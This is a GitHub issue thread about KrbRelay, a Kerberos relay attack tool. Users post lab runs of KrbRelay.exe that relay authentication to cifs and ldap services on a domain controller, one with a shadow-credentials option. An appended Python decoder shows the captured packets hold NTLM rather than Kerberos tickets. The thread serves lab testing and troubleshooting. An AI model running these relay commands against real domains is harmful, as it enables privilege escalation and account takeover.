cube0x0 / KrbRelay

Framework for Kerberos relaying

Invalid apReq

mgp25 opened this issue

commented

Hello, I was getting the message Recieved invalid apReq, exploit will fail and read issue #1, where you suggested checking the environment and parameters. Could you point out what we should look at?

Info and steps to reproduce

  • DC01: Windows Server 2019
  • PC01: Windows 10
  • Attacker PC: Windows 10

A user is logged on to PC01 (session checked with query session):

PS > query session
 SESSIONNAME       USERNAME                 ID  STATE    TYPE   DEVICE
 services                                    0  Disc
>console           user1                     1  Active

Here is the log:

PS C:\Users\attacker\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: DESKTOP-GJKLN17\attacker
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\attacker\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACgd0eTYtluhPpC9CsKnCTbAgQAAKAQ//+ktx2fV11FtiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 1
[-] Recieved invalid apReq, exploit will fail
05000b0710000000e800400002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e209000900370000000f000f00280000000a00614a0000000f4445534b544f502d474a384b4d3437574f524b47524f5550

Hope I am not missing anything

Thanks!

attacker is a non-domain context

commented

Hello @cube0x0, thanks for your fast response!

I tried it within a domain context too but it failed :/

PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: LAB\usuario1
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC+r/qOx2Z1B+pLzMg2PGlZAuwAAGwb//9Nj4c5NmmdUiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 2
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142

Another attempt:

PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn ldap/dc01.lab.local -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
[*] Relaying context: lab.local\PC01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC9YZtQo5H86MSpLrTJ2iK+AjQAAMQB//8h5G+ahu59CCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142
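The hex that KrbRelay prints under the "Recieved invalid apReq" line in both runs is the DCERPC BIND PDU it received back, and the auth trailer of that PDU already shows what the tool is complaining about. The decoder below is an added example written for this page, not code from KrbRelay or from anyone in the thread. It parses the two dumps quoted above (copied verbatim from the comments) and reports the DCERPC auth_type together with the contents of the NTLMSSP NEGOTIATE message carried in the trailer. Field offsets follow the MS-RPCE sec_trailer and the MS-NLMP NEGOTIATE_MESSAGE layouts; the names AUTH_TYPE_NAMES, parse_dcerpc_auth, parse_ntlm_negotiate and classify_auth are my own.

```python
import struct

# DCERPC BIND PDUs copied verbatim from the two KrbRelay runs quoted above
# (first the non-domain "attacker" run, then the LAB\usuario1 run).
DUMP_NON_DOMAIN = (
    "05000b0710000000e800400002000000d016d0160000000003000000"
    "000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000"
    "010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000"
    "020001004301000000000000c000000000000046000000002c1cb76c12984045030000000000000001000000"
    "0a050000000000004e544c4d535350000100000097b208e209000900370000000f000f00280000000a00614a0000000f"
    "4445534b544f502d474a384b4d3437574f524b47524f5550"
)
DUMP_DOMAIN = (
    "05000b0710000000d7002f0002000000d016d0160000000003000000"
    "000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000"
    "010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000"
    "020001004301000000000000c000000000000046000000002c1cb76c12984045030000000000000001000000"
    "0a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f"
    "504330314c4142"
)

# sec_trailer auth_type values from MS-RPCE 2.2.1.1.7 (only the ones relevant here).
AUTH_TYPE_NAMES = {0x00: "NONE", 0x09: "SPNEGO", 0x0a: "NTLMSSP", 0x10: "KERBEROS"}
NTLM_NEGOTIATE = 1


def parse_ntlm_negotiate(blob: bytes) -> dict:
    """Decode an NTLM NEGOTIATE_MESSAGE (MS-NLMP 2.2.1.1)."""
    if not blob.startswith(b"NTLMSSP\x00"):
        raise ValueError("not an NTLMSSP message")
    msg_type, flags = struct.unpack_from("<II", blob, 8)
    if msg_type != NTLM_NEGOTIATE:
        raise ValueError(f"NTLM message type {msg_type}, expected NEGOTIATE (1)")
    dom_len, _, dom_off = struct.unpack_from("<HHI", blob, 16)   # DomainNameFields
    ws_len, _, ws_off = struct.unpack_from("<HHI", blob, 24)     # WorkstationFields
    major, minor, build = struct.unpack_from("<BBH", blob, 32)   # Version
    # NEGOTIATE payload strings are OEM (single-byte) encoded, never UTF-16.
    return {
        "flags": flags,
        "domain": blob[dom_off:dom_off + dom_len].decode("latin-1"),
        "workstation": blob[ws_off:ws_off + ws_len].decode("latin-1"),
        "os_version": f"{major}.{minor}.{build}",
    }


def parse_dcerpc_auth(hexdump: str) -> dict:
    """Split a DCERPC v5 PDU into header fields, sec_trailer and auth_value."""
    pdu = bytes.fromhex(hexdump)
    ver, minor, ptype, _flags, _drep, frag_len, auth_len, call_id = struct.unpack_from("<BBBB4sHHI", pdu, 0)
    if (ver, minor) != (5, 0) or frag_len != len(pdu):
        raise ValueError("truncated or non-DCERPC-v5 PDU")
    info = {"ptype": ptype, "call_id": call_id, "auth_type": 0, "auth_type_name": "NONE",
            "auth_level": 0, "auth_data": b""}
    if auth_len == 0:
        return info
    trailer = frag_len - auth_len - 8                # 8-byte sec_trailer precedes auth_value
    auth_type, auth_level, _pad, _res, _ctx = struct.unpack_from("<BBBBI", pdu, trailer)
    info.update(auth_type=auth_type, auth_type_name=AUTH_TYPE_NAMES.get(auth_type, hex(auth_type)),
                auth_level=auth_level, auth_data=pdu[trailer + 8:trailer + 8 + auth_len])
    return info


def classify_auth(hexdump: str) -> dict:
    """Say which security provider the client used in the BIND's auth trailer."""
    info = parse_dcerpc_auth(hexdump)
    data = info["auth_data"]
    if info["auth_type"] == 0x10 and data[:1] == b"\x6e":    # DER [APPLICATION 14] = Kerberos AP-REQ
        info["verdict"] = "kerberos-apreq"
    elif info["auth_type"] == 0x09 and data[:1] == b"\x60":  # GSS-API InitialContextToken (SPNEGO)
        info["verdict"] = "spnego"
    elif data.startswith(b"NTLMSSP\x00"):
        info["verdict"] = "ntlmssp"
        info["ntlm"] = parse_ntlm_negotiate(data)
    else:
        info["verdict"] = "unknown"
    return info


if __name__ == "__main__":
    for label, dump in (("non-domain run", DUMP_NON_DOMAIN), ("domain run", DUMP_DOMAIN)):
        r = classify_auth(dump)
        print(f"{label}: auth_type={r['auth_type_name']} level={r['auth_level']} verdict={r['verdict']}")
        if "ntlm" in r:
            n = r["ntlm"]
            print(f"  NTLM NEGOTIATE from {n['domain']}\\{n['workstation']} "
                  f"(OS {n['os_version']}, flags {n['flags']:#010x})")
```

Run as-is, it reports auth_type 0x0a (NTLMSSP) for both dumps, with OEM domain\workstation WORKGROUP\DESKTOP-GJ8KM47 in the first run and LAB\PC01 in the second. In other words, what came back was an NTLM NEGOTIATE, not a Kerberos AP-REQ (auth_type 0x10, DER tag 0x6e) or a SPNEGO token wrapping one (auth_type 0x09, tag 0x60), so there is no apReq for a Kerberos relay to forward. Checking this trailer is a quicker first step than re-reading the parameters: if the provider is NTLMSSP, the client side never chose Kerberos for that SPN, and the fix lies in the environment rather than in the relay.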